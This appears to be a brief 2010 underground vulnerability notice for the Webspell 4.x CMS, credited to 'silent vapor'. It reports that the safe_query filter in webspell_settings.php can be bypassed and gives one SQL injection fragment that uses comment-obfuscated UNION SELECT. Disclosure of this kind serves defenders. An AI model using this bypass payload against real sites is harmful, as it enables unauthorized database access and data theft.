################# INFORMATION ################################################## +Name : Webspell 4.X safe_query bypass Vulnerability +Author : silent vapor +Date : 29.09.2010 +Script : webspell +Price : free +Language :PHP +Discovered by silent vapor +Underground Agents +Greetz to Team-Internet, 4004-Security-Project, Easy Laster ################################################################################ +Vulnerability : webspell_settings.php "function safe_query" +Exploitable : %20UNION+/**/+SELECT%20 ################################################################################